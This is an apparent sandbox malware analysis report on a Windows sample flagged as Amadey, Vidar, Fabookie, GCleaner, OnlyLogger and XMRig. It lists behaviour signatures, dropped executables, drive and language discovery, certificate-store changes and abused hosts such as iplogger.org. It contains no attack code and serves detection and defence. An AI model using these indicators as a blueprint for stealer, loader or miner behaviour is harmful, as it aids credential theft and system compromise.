Malware Analysis Report

2025-01-02 06:49

Sample ID 241205-lncs4syncw
Target c71460537b9584b5f550df694b80c9aa_JaffaCakes118
SHA256 c329c73a0c1f6f156cc7a662abdf5e7ea30ed8b8f4b35253bf7f2435b83445c8
Tags
amadey fabookie gcleaner onlylogger vidar 933 a6b927 discovery loader spyware stealer trojan xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c329c73a0c1f6f156cc7a662abdf5e7ea30ed8b8f4b35253bf7f2435b83445c8

Threat Level: Known bad

The file c71460537b9584b5f550df694b80c9aa_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

amadey fabookie gcleaner onlylogger vidar 933 a6b927 discovery loader spyware stealer trojan xmrig miner

OnlyLogger

GCleaner

Vidar

Amadey family

Onlylogger family

Fabookie family

Fabookie

Amadey

Gcleaner family

Vidar family

Xmrig family

Detect Fabookie payload

xmrig

Vidar Stealer

XMRig Miner payload

OnlyLogger payload

Blocklisted process makes network request

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Looks up external IP address via web service

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Program crash

System Time Discovery

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies system certificate store

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-05 09:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-05 09:40

Reported

2024-12-05 09:42

Platform

win7-20241023-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Vidar

stealer vidar

Vidar family

vidar

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lijun-game.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f7873aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f77c275.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77c275.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC83E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC87D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC4C2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC7EE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC88E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC92B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77c276.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC80E.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f77c276.ipi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\lijun-game.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\inst001.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f7873aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

System Time Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
